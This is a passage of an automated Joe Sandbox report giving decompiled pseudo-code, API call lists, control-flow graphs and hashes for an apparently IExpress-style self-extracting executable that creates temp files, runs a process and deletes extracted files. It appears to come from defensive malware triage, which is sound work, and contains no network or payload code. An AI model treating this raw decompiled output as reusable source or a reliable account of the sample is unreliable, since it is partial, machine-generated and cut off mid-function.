                                                                                                                                                                                                    0x00176b65
                                                                                                                                                                                                    0x00176b67
                                                                                                                                                                                                    0x00176b6c
                                                                                                                                                                                                    0x00176b6e
                                                                                                                                                                                                    0x00176b71
                                                                                                                                                                                                    0x00176b74
                                                                                                                                                                                                    0x00176b74
                                                                                                                                                                                                    0x00176b79
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176b7d
                                                                                                                                                                                                    0x00176b81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176b83
                                                                                                                                                                                                    0x00176b8c
                                                                                                                                                                                                    0x00176b8d
                                                                                                                                                                                                    0x00176b90
                                                                                                                                                                                                    0x00176b90
                                                                                                                                                                                                    0x00176b83
                                                                                                                                                                                                    0x00176b81
                                                                                                                                                                                                    0x00176b94
                                                                                                                                                                                                    0x00176b98
                                                                                                                                                                                                    0x00176ba2
                                                                                                                                                                                                    0x00176b9a
                                                                                                                                                                                                    0x00176b9a
                                                                                                                                                                                                    0x00176b9a
                                                                                                                                                                                                    0x00176ba3
                                                                                                                                                                                                    0x00176bab
                                                                                                                                                                                                    0x00176bb0
                                                                                                                                                                                                    0x00176bb5
                                                                                                                                                                                                    0x00176bbc
                                                                                                                                                                                                    0x00176bbf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176bbf
                                                                                                                                                                                                    0x00176c1e
                                                                                                                                                                                                    0x00176c25
                                                                                                                                                                                                    0x00176c27
                                                                                                                                                                                                    0x00176c2d
                                                                                                                                                                                                    0x00176c2d
                                                                                                                                                                                                    0x00176c32
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176bc5
                                                                                                                                                                                                    0x00176bc5
                                                                                                                                                                                                    0x00176bc8
                                                                                                                                                                                                    0x00176bcc
                                                                                                                                                                                                    0x00176bce
                                                                                                                                                                                                    0x00176bce
                                                                                                                                                                                                    0x00176bd1
                                                                                                                                                                                                    0x00176bd3
                                                                                                                                                                                                    0x00176bd3
                                                                                                                                                                                                    0x00176bd6
                                                                                                                                                                                                    0x00176bda
                                                                                                                                                                                                    0x00176be1
                                                                                                                                                                                                    0x00176be3
                                                                                                                                                                                                    0x00176be5
                                                                                                                                                                                                    0x00176be5
                                                                                                                                                                                                    0x00176be6
                                                                                                                                                                                                    0x00176be6
                                                                                                                                                                                                    0x00176be9
                                                                                                                                                                                                    0x00176bea
                                                                                                                                                                                                    0x00176bea
                                                                                                                                                                                                    0x00176b74
                                                                                                                                                                                                    0x00176c39
                                                                                                                                                                                                    0x00176c3e
                                                                                                                                                                                                    0x00176c3e
                                                                                                                                                                                                    0x00176abe
                                                                                                                                                                                                    0x00176abe
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00177155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00177182
                                                                                                                                                                                                      • Part of subcall function 00177155: GetCurrentProcessId.KERNEL32 ref: 00177191
                                                                                                                                                                                                      • Part of subcall function 00177155: GetCurrentThreadId.KERNEL32 ref: 0017719A
                                                                                                                                                                                                      • Part of subcall function 00177155: GetTickCount.KERNEL32 ref: 001771A3
                                                                                                                                                                                                      • Part of subcall function 00177155: QueryPerformanceCounter.KERNEL32(?), ref: 001771B8
                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,001772B8,00000058), ref: 00176A7F
                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00176AB4
                                                                                                                                                                                                    • _amsg_exit.MSVCRT ref: 00176AC9
                                                                                                                                                                                                    • _initterm.MSVCRT ref: 00176B1D
                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00176B49
                                                                                                                                                                                                    • exit.KERNELBASE ref: 00176BBF
                                                                                                                                                                                                    • _ismbblead.MSVCRT ref: 00176BDA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 836923961-0
                                                                                                                                                                                                    • Opcode ID: 6648be2e7f152a4986b58bf5dffc5779c2f0ee77847e60557224dec8c2933c59
                                                                                                                                                                                                    • Instruction ID: f71a04d4b8015aad4402ce85319dd1fe99d79d2c7cf4dda7c988c34d70c90b67
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6648be2e7f152a4986b58bf5dffc5779c2f0ee77847e60557224dec8c2933c59
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E441C231A84B259FDB259B68D8097697BB0AB49721F64C02AE84DE36D1CF7049C18B81
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 631 1758c8-1758d5 632 1758d8-1758dd 631->632 632->632 633 1758df-1758f1 LocalAlloc 632->633 634 1758f3-175901 call 1744b9 633->634 635 175919-175959 call 171680 call 17658a CreateFileA LocalFree 633->635 639 175906-175910 call 176285 634->639 635->639 644 17595b-17596c CloseHandle GetFileAttributesA 635->644 645 175912-175918 639->645 644->639 646 17596e-175970 644->646 646->639 647 175972-17597b 646->647 647->645
                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E001758C8(intOrPtr* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				signed char _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                                                    				CHAR* _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_t27 = __ecx;
                                                                                                                                                                                                    				_t23 = __ecx + 1;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t6 =  *_t27;
                                                                                                                                                                                                    					_t27 = _t27 + 1;
                                                                                                                                                                                                    				} while (_t6 != 0);
                                                                                                                                                                                                    				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                    				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                                                                                    					E00171680(_t20, _t36, _t33);
                                                                                                                                                                                                    					E0017658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                    					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                    					_v8 = _t10;
                                                                                                                                                                                                    					LocalFree(_t20);
                                                                                                                                                                                                    					_t12 = _v8;
                                                                                                                                                                                                    					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                    						goto L4;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						CloseHandle(_t12);
                                                                                                                                                                                                    						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                    						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0x179124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E001744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					 *0x179124 = E00176285();
                                                                                                                                                                                                    					_t14 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x001758cd
                                                                                                                                                                                                    0x001758d1
                                                                                                                                                                                                    0x001758d3
                                                                                                                                                                                                    0x001758d5
                                                                                                                                                                                                    0x001758d8
                                                                                                                                                                                                    0x001758d8
                                                                                                                                                                                                    0x001758da
                                                                                                                                                                                                    0x001758db
                                                                                                                                                                                                    0x001758e1
                                                                                                                                                                                                    0x001758ed
                                                                                                                                                                                                    0x001758f1
                                                                                                                                                                                                    0x0017591e
                                                                                                                                                                                                    0x0017592c
                                                                                                                                                                                                    0x00175943
                                                                                                                                                                                                    0x0017594a
                                                                                                                                                                                                    0x0017594d
                                                                                                                                                                                                    0x00175953
                                                                                                                                                                                                    0x00175959
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017595b
                                                                                                                                                                                                    0x0017595c
                                                                                                                                                                                                    0x00175963
                                                                                                                                                                                                    0x0017596c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175972
                                                                                                                                                                                                    0x00175974
                                                                                                                                                                                                    0x0017597a
                                                                                                                                                                                                    0x0017597a
                                                                                                                                                                                                    0x0017596c
                                                                                                                                                                                                    0x001758f3
                                                                                                                                                                                                    0x00175901
                                                                                                                                                                                                    0x00175906
                                                                                                                                                                                                    0x0017590b
                                                                                                                                                                                                    0x00175910
                                                                                                                                                                                                    0x00175910
                                                                                                                                                                                                    0x00175918

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00175534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 001758E7
                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00175534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175943
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00175534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017594D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00175534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017595C
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00175534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175963
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                    • API String ID: 747627703-2139698323
                                                                                                                                                                                                    • Opcode ID: f378232f59475a560d96d3f419772773027d9735469ce5e8dd59700ed09a585d
                                                                                                                                                                                                    • Instruction ID: 0f0244874cfc31c34dca915ab699aad29d0b0778ba134f060dc69d3135ee8f46
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f378232f59475a560d96d3f419772773027d9735469ce5e8dd59700ed09a585d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF11267170021167D7241F795C0DA9B7EBAEF86374B508A19B60ED3581CBB0888582A0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 675 173fef-174010 676 174016-17403b CreateProcessA 675->676 677 17410a-17411a call 176ce0 675->677 678 1740c4-174101 call 176285 GetLastError FormatMessageA call 1744b9 676->678 679 174041-17406e WaitForSingleObject GetExitCodeProcess 676->679 693 174106 678->693 682 174091 call 17411b 679->682 683 174070-174077 679->683 688 174096-1740b8 CloseHandle * 2 682->688 683->682 687 174079-17407b 683->687 687->682 690 17407d-174089 687->690 691 1740ba-1740c0 688->691 692 174108 688->692 690->682 694 17408b 690->694 691->692 695 1740c2 691->695 692->677 693->692 694->682 695->693
                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                    			E00173FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v524;
                                                                                                                                                                                                    				long _v528;
                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t20;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    				int _t25;
                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t45 = __edx;
                                                                                                                                                                                                    				_t20 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                    				_t39 = __ecx;
                                                                                                                                                                                                    				_t49 = 1;
                                                                                                                                                                                                    				_t22 = 0;
                                                                                                                                                                                                    				if(__ecx == 0) {
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					return E00176CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                    				if(_t25 == 0) {
                                                                                                                                                                                                    					 *0x179124 = E00176285();
                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                    					_t45 = 0x4c4;
                                                                                                                                                                                                    					E001744B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					_t49 = 0;
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t22 = _t49;
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                    				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                    				_t44 = _v528;
                                                                                                                                                                                                    				_t53 =  *0x178a28; // 0x0
                                                                                                                                                                                                    				if(_t53 == 0) {
                                                                                                                                                                                                    					_t34 =  *0x179a2c; // 0x0
                                                                                                                                                                                                    					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                    						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                    						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                    							 *0x179a2c = _t44;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E0017411B(_t34, _t44);
                                                                                                                                                                                                    				CloseHandle(_v544.hThread);
                                                                                                                                                                                                    				CloseHandle(_v544);
                                                                                                                                                                                                    				if(( *0x179a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00173fef
                                                                                                                                                                                                    0x00173ffa
                                                                                                                                                                                                    0x00174001
                                                                                                                                                                                                    0x00174008
                                                                                                                                                                                                    0x0017400a
                                                                                                                                                                                                    0x0017400b
                                                                                                                                                                                                    0x00174010
                                                                                                                                                                                                    0x0017410a
                                                                                                                                                                                                    0x0017411a
                                                                                                                                                                                                    0x0017411a
                                                                                                                                                                                                    0x0017401c
                                                                                                                                                                                                    0x0017401d
                                                                                                                                                                                                    0x0017401e
                                                                                                                                                                                                    0x0017401f
                                                                                                                                                                                                    0x00174033
                                                                                                                                                                                                    0x0017403b
                                                                                                                                                                                                    0x001740ca
                                                                                                                                                                                                    0x001740e9
                                                                                                                                                                                                    0x001740f8
                                                                                                                                                                                                    0x00174101
                                                                                                                                                                                                    0x00174106
                                                                                                                                                                                                    0x00174106
                                                                                                                                                                                                    0x00174108
                                                                                                                                                                                                    0x00174108
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174108
                                                                                                                                                                                                    0x00174049
                                                                                                                                                                                                    0x0017405c
                                                                                                                                                                                                    0x00174062
                                                                                                                                                                                                    0x00174068
                                                                                                                                                                                                    0x0017406e
                                                                                                                                                                                                    0x00174070
                                                                                                                                                                                                    0x00174077
                                                                                                                                                                                                    0x0017407f
                                                                                                                                                                                                    0x00174089
                                                                                                                                                                                                    0x0017408b
                                                                                                                                                                                                    0x0017408b
                                                                                                                                                                                                    0x00174089
                                                                                                                                                                                                    0x00174077
                                                                                                                                                                                                    0x00174091
                                                                                                                                                                                                    0x0017409c
                                                                                                                                                                                                    0x001740a8
                                                                                                                                                                                                    0x001740b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001740c2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001740c2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateProcessA.KERNELBASE ref: 00174033
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00174049
                                                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 0017405C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0017409C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001740A8
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001740DC
                                                                                                                                                                                                    • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 001740E9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3183975587-0
                                                                                                                                                                                                    • Opcode ID: f7c013192a69338093dfdb325360d8036b018aa34712940b3abe3edfba172a0b
                                                                                                                                                                                                    • Instruction ID: 74138e3bbbb9f1a8a8098ac4c2bf7e28496c4fd25210be3e3f9bc0571da5e9fd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7c013192a69338093dfdb325360d8036b018aa34712940b3abe3edfba172a0b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE31CE31681218ABEB209B65DC4CFAB777CEBD4701F6081A9F60DD29A1CB305CC5CB21
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E001751E5(void* __eflags) {
                                                                                                                                                                                                    				int _t5;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t1 = E0017468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                    				if(_t28 != 0) {
                                                                                                                                                                                                    					if(E0017468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                    						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                    						if(_t5 != 0) {
                                                                                                                                                                                                    							_t6 = E001744B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                    							LocalFree(_t28);
                                                                                                                                                                                                    							if(_t6 != 6) {
                                                                                                                                                                                                    								 *0x179124 = 0x800704c7;
                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *0x179124 = 0;
                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                    							return 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						LocalFree(_t28);
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E001744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					LocalFree(_t28);
                                                                                                                                                                                                    					 *0x179124 = 0x80070714;
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E001744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    				 *0x179124 = E00176285();
                                                                                                                                                                                                    				goto L10;
                                                                                                                                                                                                    			}






                                                                                                                                                                                                    0x001751fb
                                                                                                                                                                                                    0x00175207
                                                                                                                                                                                                    0x0017520b
                                                                                                                                                                                                    0x0017523c
                                                                                                                                                                                                    0x00175268
                                                                                                                                                                                                    0x00175270
                                                                                                                                                                                                    0x0017528b
                                                                                                                                                                                                    0x00175293
                                                                                                                                                                                                    0x0017529c
                                                                                                                                                                                                    0x001752a6
                                                                                                                                                                                                    0x001752b0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001752b0
                                                                                                                                                                                                    0x0017529e
                                                                                                                                                                                                    0x00175279
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017527b
                                                                                                                                                                                                    0x00175273
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175273
                                                                                                                                                                                                    0x0017524a
                                                                                                                                                                                                    0x00175250
                                                                                                                                                                                                    0x00175256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175256
                                                                                                                                                                                                    0x00175219
                                                                                                                                                                                                    0x00175223
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
                                                                                                                                                                                                      • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
                                                                                                                                                                                                      • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
                                                                                                                                                                                                      • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
                                                                                                                                                                                                      • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
                                                                                                                                                                                                      • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00172F4D,?,00000002,00000000), ref: 00175201
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00175250
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                      • Part of subcall function 00176285: GetLastError.KERNEL32(00175BBC), ref: 00176285
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                    • Opcode ID: 474ef6c75a868ecd4d74d2928133276f9c5ab24d696c300f7df21cf4f01edbdd
                                                                                                                                                                                                    • Instruction ID: a067182e80f3d08e5c73177a4ca4fbac8e04b75f3e7a743e0a8755a1c71fca31
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 474ef6c75a868ecd4d74d2928133276f9c5ab24d696c300f7df21cf4f01edbdd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 141104B1344601BBE3146B715C89F3B61BEEFD9390B91C439F64ED6591EBB98C805134
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                    			E001752B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR** _t31;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 = __edi;
                                                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                                                    				_t21 = __ebx;
                                                                                                                                                                                                    				_t9 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                    				_t31 =  *0x1791e0; // 0x33c7230
                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t29 = _t31;
                                                                                                                                                                                                    						if( *0x178a24 == 0 &&  *0x179a30 == 0) {
                                                                                                                                                                                                    							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                    							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                    						}
